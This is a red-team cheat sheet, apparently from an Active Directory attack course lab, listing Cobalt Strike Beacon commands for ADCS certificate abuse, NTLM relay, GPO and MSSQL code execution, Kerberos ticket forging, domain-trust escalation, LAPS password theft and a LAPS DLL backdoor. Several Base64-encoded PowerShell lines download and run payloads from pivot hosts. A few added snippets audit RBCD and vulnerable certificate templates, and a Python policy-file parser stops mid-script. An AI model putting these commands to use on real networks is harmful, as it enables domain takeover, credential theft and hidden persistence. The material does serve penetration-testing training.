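ConvertFrom-RbcdDescriptor -Descriptor 'O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)' |
    Format-Table -AutoSize

# Live audit. Any row that is not a known, documented delegation should be removed:
#   Set-ADComputer -Identity <computer> -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
Get-RbcdGrant | Format-Table -AutoSize
```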
Active Directory Certificate Services
ADCS Enumeration
Usage: Discover and analyze Certificate Authorities and templates.
# Find Certificate Authorities
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas
# Find vulnerable certificate templates
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
ESC1: ENROLLEE_SUPPLIES_SUBJECT
Usage: Abuse certificate templates allowing subject alternative names.
# 1. Request certificate with alternative name
beacon> getuid
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb
# 2. Convert certificate to PFX format
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# 3. Encode certificate for Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
# 4. Request TGT using certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:<password> /nowrap
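Added audit example (not part of the original cheat sheet and not Certify's code): it reads the template objects from the Configuration partition and reports those that meet the ESC1 preconditions used above (enrollee supplies the subject, client-authentication capable EKU, no manager approval). It assumes a domain-joined session with LDAP access; the flag bits and EKU OIDs are the documented msPKI values, and enrollment permissions on the template are not evaluated here.

```powershell
# Added audit example, not part of the original cheat sheet or of Certify.
# Reports certificate templates that meet the ESC1 preconditions: the enrollee
# supplies the subject, the template can issue logon-capable certificates, and no
# manager approval is required. Who may enroll is not checked here; review the
# template ACL separately. Assumes a domain-joined session with LDAP access.

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # bit in msPKI-Enrollment-Flag (manager approval)
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '2.5.29.37.0'               # Any Purpose
)

function Get-Esc1Template {
    $configNc = ([ADSI]'LDAP://RootDSE').configurationNamingContext
    $base = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNc"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($base)
    $searcher.Filter = '(objectClass=pKICertificateTemplate)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('cn', 'mspki-certificate-name-flag', 'mspki-enrollment-flag', 'pkiextendedkeyusage'))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        # Both flag attributes are signed 32-bit integers; an absent attribute counts as 0.
        $nameFlag   = [int]($p['mspki-certificate-name-flag'] | Select-Object -First 1)
        $enrollFlag = [int]($p['mspki-enrollment-flag']       | Select-Object -First 1)
        $ekus       = @($p['pkiextendedkeyusage'] | ForEach-Object { [string]$_ })

        $enrolleeSuppliesSubject = ($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $requiresApproval        = ($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
        # An empty EKU list means the certificate is valid for any purpose, including logon.
        $usableForAuth = ($ekus.Count -eq 0) -or
                         (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)

        if ($enrolleeSuppliesSubject -and $usableForAuth -and -not $requiresApproval) {
            [pscustomobject]@{
                Template        = [string]$p['cn'][0]
                ManagerApproval = $requiresApproval
                Ekus            = ($ekus -join ', ')
            }
        }
    }
}

# Remediation for a hit: clear ENROLLEE_SUPPLIES_SUBJECT on the template, require
# manager approval, or tighten enrollment rights, then republish the template.
Get-Esc1Template | Format-Table -AutoSize
```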
ESC8: NTLM Relay to ADCS HTTP Endpoints
Usage: Relay NTLM authentication to certificate web enrollment endpoints.
# 1. Setup SOCKS proxy
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# 2. Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password
# 3. Setup NTLM relay targeting ADCS
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
# 4. Setup port redirection
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
# 5. Force authentication using PrintSpooler
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
# 6. Use captured certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /nowrap
# 7. S4U attack with machine certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
# 8. Access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> steal_token 1234
beacon> ls \\web.dev.cyberbotic.io\c$
ADCS Persistence
Usage: Maintain access using certificate-based authentication.
User Certificate Persistence
# 1. Enumerate existing user certificates
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
# 2. Export user certificates
beacon> mimikatz crypto::certificates /export
# 3. Encode PFX for Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0
# 4. Use certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /enctype:aes256 /nowrap
# 5. Request certificate if not present
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User
Computer Certificate Persistence
# 1. Export machine certificate (requires elevated session)
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
# 2. Use machine certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
# 3. Request machine certificate if needed
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine
Group Policy
Modify Existing GPO
Usage: Abuse writable GPO permissions to execute code on target systems.
# 1. Find GPOs with write permissions
beacon> powerpick Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# 2. Resolve GPO details
beacon> powerpick Get-DomainGPO -Identity "CN={AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}
# 3. Find target systems
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName
# 4. Setup infrastructure for payload delivery
# Create pivot listener and enable firewall rules
beacon> powerpick New-NetFirewallRule -DisplayName "Rule 1" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 1234
beacon> powerpick New-NetFirewallRule -DisplayName "Rule 2" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80
# 5. Modify GPO to add scheduled task
beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAHAAaQB2AG8AdAAiACkAKQA=" --GPOName "Vulnerable GPO"
Create and Link New GPO
Usage: Create new GPO and link it to organizational units.
# 1. Check GPO creation rights
beacon> powerpick Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
# 2. Find OUs with GP-Link write privileges
beacon> powerpick Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# 3. Verify RSAT tools availability
beacon> powerpick Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
# 4. Create and configure new GPO
beacon> powerpick New-GPO -Name "Evil GPO"
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> cd \\dc-2\software
beacon> upload C:\Payloads\pivot.exe
beacon> powerpick Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\pivot.exe" -Type ExpandString
# 5. Link GPO to target OU
beacon> powerpick Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"
MSSQL Servers
MSSQL Enumeration and Access
Usage: Discover and interact with MSSQL instances.
# Import PowerUpSQL for MSSQL enumeration
beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
# Discover MSSQL instances
beacon> powerpick Get-SQLInstanceDomain
# Test connectivity
beacon> powerpick Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
beacon> powerpick Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
MSSQL Command Execution
Usage: Execute commands through MSSQL instances.
# Basic query execution
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select @@servername"
# OS command execution via PowerUpSQL
beacon> powerpick Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
Interactive MSSQL Access
Usage: Direct MSSQL client access for advanced operations.
# Connect using mssqlclient.py through proxy
ubuntu@DESKTOP-3BSK7NO ~> proxychains mssqlclient.py -windows-auth DEV/bfarmer@10.10.122.25 -debug
# Enable xp_cmdshell if disabled
SQL> SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL> sp_configure 'Show Advanced Options', 1; RECONFIGURE;
SQL> sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Execute commands
SQL> EXEC xp_cmdshell 'whoami';
SQL> EXEC xp_cmdshell 'powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBwAGkAdgBvAHQAIgApAA==';
MSSQL Database Links
Usage: Lateral movement through database link trusts.
# Enumerate database links
beacon> powerpick Get-SQLServerLink -Instance "sql-2.dev.cyberbotic.io,1433"
beacon> powerpick Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
# Execute commands through links
beacon> powerpick Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433" -Query "exec master..xp_cmdshell 'whoami'"
# Manual link enumeration and execution
SQL> SELECT * FROM master..sysservers;
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
# Enable xp_cmdshell on linked server
SQL> EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
SQL> EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
# Execute commands on linked server
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHAAaQB2AG8AdAAyACIAKQA=''')
MSSQL Privilege Escalation
Usage: Escalate from MSSQL service account to SYSTEM.
# Check current privileges
beacon> getuid
beacon> shell whoami /priv
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
# Use SweetPotato for SeImpersonate privilege escalation
beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHQAYwBwAC0AbABvAGMAYQBsACIAKQA="
beacon> connect localhost 4444
Domain Dominance
Service Requirements for Tickets:
- psexec: CIFS
- winrm: HOST & HTTP
- dcsync (DCs only): LDAP
Silver Ticket (Offline)
Usage: Create service-specific tickets without contacting the DC.
# 1. Extract Kerberos encryption keys
beacon> mimikatz !sekurlsa::ekeys
# 2. Generate silver ticket offline
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# 3. Inject ticket and verify access
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=
beacon> steal_token 5668
beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
Golden Ticket (Offline)
Usage: Create domain-wide authentication tickets.
# 1. Extract krbtgt account hash
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
# 2. Generate golden ticket offline
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# 3. Inject golden ticket and access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-2.dev.cyberbotic.io\c$
Diamond Ticket (Online)
Usage: Create more legitimate-looking tickets using real TGT templates.
# 1. Get user SID
beacon> powerpick ConvertTo-SID dev/nlamb
# 2. Create diamond ticket (512 = Domain Admins group)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:<krbtgt-aes256> /nowrap
# 3. Compare diamond vs golden ticket properties
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...snip...]MuSU8=
Forged Certificates
Usage: Create malicious certificates using stolen CA private keys.
# 1. Extract CA private key and certificate (execute on DC/CA)
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
# 2. Convert certificate to PFX format
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# 3. Forge certificate for target user
PS C:\Users\Attacker> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123
# 4. Encode forged certificate
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
# 5. Request TGT using forged certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap
# 6. Access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-2.dev.cyberbotic.io\c$
Forest & Domain Trusts
Trust Enumeration
Usage: Discover trust relationships between domains.
# Enumerate domain trusts (use -Domain for specific domains)
beacon> powerpick Get-DomainTrust
Child to Parent Domain Privilege Escalation
Usage: Escalate from child domain to parent domain using SID history.
# 1. Gather required information
beacon> powerpick Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid
beacon> powerpick Get-DomainController -Domain cyberbotic.io | select Name
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Domain cyberbotic.io | select MemberName
# 2. Option A: Golden ticket with SID history injection (forged offline on the attacker host; only the child domain's krbtgt AES key is needed)
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<aes256> /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-512 /nowrap
# 2. Option B: Diamond ticket with SID history (requests a real TGT via /tgtdeleg and rewrites its PAC, so it runs from the Beacon with domain connectivity)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:<krbtgt-aes256> /nowrap
# 3. Access parent domain resources (the ticket was forged for Administrator, so use that name for the netonly logon session)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:Administrator /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-1.cyberbotic.io\c$
beacon> jump psexec64 dc-1.cyberbotic.io PeerSambhar
beacon> dcsync cyberbotic.io cyber\krbtgt
Exploiting Inbound Trusts
Usage: Abuse an inbound trust (the foreign domain trusts ours): principals from our domain can be members of groups in the foreign domain, so compromising such a user gives access there.
# 1. Enumerate trust relationships
beacon> powerpick Get-DomainTrust
beacon> powerpick Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName
# 2. Find foreign users with local privileges
beacon> powerpick Get-DomainForeignGroupMember -Domain dev-studio.com
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
beacon> powerpick Get-DomainGroupMember -Identity "Studio Admins" | select MemberName
beacon> powerpick Get-DomainController -Domain dev-studio.com | select Name
# 3. Extract user credentials
beacon> dcsync dev.cyberbotic.io dev\nlamb
# 4. Request a TGT for the user in our own domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:<aes256> /nowrap
# 5. Request the inter-realm (referral) TGT for the foreign domain, i.e. a service ticket for krbtgt/dev-studio.com
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap
# 6. Request service ticket in foreign domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap
# 7. Access foreign domain resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc.dev-studio.com\c$
Exploiting Outbound Trusts
Usage: Abuse an outbound trust (our domain trusts a foreign one) by extracting the shared trust key from our DC and authenticating to the foreign domain as the trust account. This only yields domain-user level access in the foreign domain, but that is enough to enumerate it.
# 1. Enumerate outbound trusts
beacon> powerpick Get-DomainTrust -Domain cyberbotic.io
# 2. Identify trusted domain objects (TDO)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(objectCategory=trustedDomain)" --domain cyberbotic.io --attributes distinguishedName,name,flatName,trustDirection
# 3. Extract the trust key on the DC (lsadump::trust /patch reads it from LSASS, so the Beacon must be running elevated on a DC; confirm with hostname first)
beacon> run hostname
beacon> mimikatz lsadump::trust /patch
# Alternative: Remote DCSync for trust key
beacon> powerpick Get-DomainObject -Identity "CN=msp.org,CN=System,DC=cyberbotic,DC=io" | select objectGuid
beacon> mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}
# 4. Authenticate to the foreign domain as the trust account (our domain's NetBIOS name plus $, here CYBER$) using the trust key; /rc4 is the NTLM hash of the trust password from lsadump::trust or the TDO DCSync
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /nowrap
# 5. Access the foreign domain (the trust account has only domain-user rights there)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:MSP /username:CYBER$ /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
beacon> steal_token 5060
beacon> run klist
# 6. Enumerate the foreign domain with the new identity
beacon> powerpick Get-Domain -Domain msp.org
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(objectCategory=user)" --domain msp.org
LAPS
LAPS Detection
Usage: Identify Local Administrator Password Solution deployment.
# Check for LAPS client installation
beacon> ls C:\Program Files\LAPS\CSE
# Find computers with LAPS attributes (only computers managed by LAPS carry an expiration time)
beacon> powerpick Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
# Identify LAPS GPO configuration
beacon> powerpick Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
LAPS Configuration Analysis
Usage: Download and analyze LAPS policy settings.
# Download LAPS policy files
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol
# Parse the policy file (Parse-PolFile comes from the GPRegistryPolicyParser PowerShell module; it lists the AdmPwd registry values such as password length, age and expiration protection)
PS C:\Users\Attacker> Parse-PolFile .\Desktop\Registry.pol
LAPS Password Access
Usage: Identify who can read LAPS passwords and extract them.
# Find principals with LAPS read permissions
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# Use LAPS Toolkit for enumeration
beacon> powershell-import C:\Tools\LAPSToolkit\LAPSToolkit.ps1
beacon> powerpick Find-LAPSDelegatedGroups
beacon> powerpick Find-AdmPwdExtendedRights
# Extract LAPS passwords (requires appropriate permissions)
beacon> powerpick Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd
beacon> powerpick Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
# Use extracted credentials
beacon> make_token .\LapsAdmin 1N3FyjJR5L18za
beacon> ls \\wkstn-1\c$
LAPS Persistence and Backdoors
Usage: Maintain access despite LAPS password rotation.
# Set a far-future expiry so the password is not rotated. Run this in the machine's own context (e.g. SYSTEM on wkstn-1), since a computer can write its own ms-Mcs-AdmPwdExpirationTime; it is defeated if the LAPS policy "Do not allow password expiration time longer than required by policy" is enabled
beacon> powerpick Set-DomainObject -Identity wkstn-1 -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'} -Verbose
# LAPS DLL Backdoor
# Modify AdmPwd.PS.dll and AdmPwd.Utils.dll in:
# C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\
# to log passwords when viewed by administrators
AppLocker
AppLocker Policy Enumeration
Usage: Discover AppLocker restrictions and find bypass opportunities.
# Enumerate AppLocker policy via GPO
beacon> powershell Get-DomainGPO -Domain dev-studio.com | ? { $_.DisplayName -like "*AppLocker*" } | select displayname, gpcfilesyspath
beacon> download \\dev-studio.com\SysVol\dev-studio.com\Policies\{7E1E1636-1A59-4C35-895B-3AEB1CA8CFC2}\Machine\Registry.pol
# Parse policy file
PS C:\Users\Attacker> Parse-PolFile .\Desktop\Registry.pol
# Check local AppLocker policy
PS C:\Users\Administrator> Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"
PS C:\Users\Administrator> Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"
# Check the PowerShell language mode (ConstrainedLanguage means AppLocker/WDAC is locking down powershell.exe; this is not the execution policy)
PS C:\Users\Administrator> $ExecutionContext.SessionState.LanguageMode
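Added here as a worked example (not code from the course or this cheat sheet), the following Python script parses a Registry.pol downloaded from SYSVOL offline, which is what Parse-PolFile does in both the LAPS Configuration Analysis and the AppLocker Policy Enumeration steps above. It implements Microsoft's documented PReg layout: the ASCII signature "PReg", a little-endian version DWORD (1), then entries written as UTF-16LE text of the form `[key;value;type;size;data]`, where key and value are NUL-terminated UTF-16LE strings and data is `size` raw bytes. The sample file is constructed inside the script; the AdmPwd and SrpV2 key/value names are the real policy names, the AppLocker rule GUID and its XML are made up.

```python
"""Registry.pol (PReg) parser: what Parse-PolFile shows, done offline in Python."""
import struct

REG_SZ, REG_EXPAND_SZ, REG_DWORD = 1, 2, 4
TYPE_NAMES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
LB, SC, RB = "[".encode("utf-16-le"), ";".encode("utf-16-le"), "]".encode("utf-16-le")
LAPS_KEY = r"Software\Policies\Microsoft Services\AdmPwd"   # legacy LAPS policy key
SRPV2_KEY = r"Software\Policies\Microsoft\Windows\SrpV2"     # AppLocker policy key

def _u16z(text):
    """NUL-terminated UTF-16LE string, the encoding PReg uses for key and value names."""
    return text.encode("utf-16-le") + b"\x00\x00"

def encode_data(rtype, value):
    """Python value -> raw registry bytes (used only to build the constructed sample)."""
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return _u16z(value)
    if rtype == REG_DWORD:
        return struct.pack("<I", value)
    return bytes(value)

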